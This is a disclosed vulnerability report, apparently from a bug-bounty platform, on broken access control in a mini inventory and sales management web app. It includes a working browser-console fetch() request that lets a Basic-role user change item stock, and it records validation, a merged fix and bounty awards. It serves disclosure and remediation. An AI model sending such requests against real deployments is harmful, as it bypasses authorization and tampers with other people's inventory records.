Execution with Unnecessary Privileges in amirsanni/mini-inventory-and-sales-management-system

Valid

Reported on

Jul 31st 2021


💥 BUG

unprivileged user can update stoke

💥 STEP TO REPDOUCE

1. From admin account goto https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators and add new user callled user-B with basic role .
2. Now goto user-B account and here user-B cant see any item.
Now user-B execute bellow javascript code in browser console and it will update a stoke

await fetch("https://1410inc.xyz/mini-inventory-and-sales-management-system/items/updatestock", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    },
    "referrer": "https://1410inc.xyz/mini-inventory-and-sales-management-system/items",
    "body": "_iId=824&_upType=newStock&qty=1&desc=New+items+were+purchasedkk",
    "method": "POST",
    "mode": "cors"
});

Here in this request you need change _iId parameter value to item-id.

💥 IMPACT

user with Basic role can update item-stoke

Occurences

We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back 4 months ago
amirsanni/mini-inventory-and-sales-management-system maintainer validated this vulnerability 4 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir confirmed that a fix has been merged on ba36f6 4 months ago
Amir has been awarded the fix bounty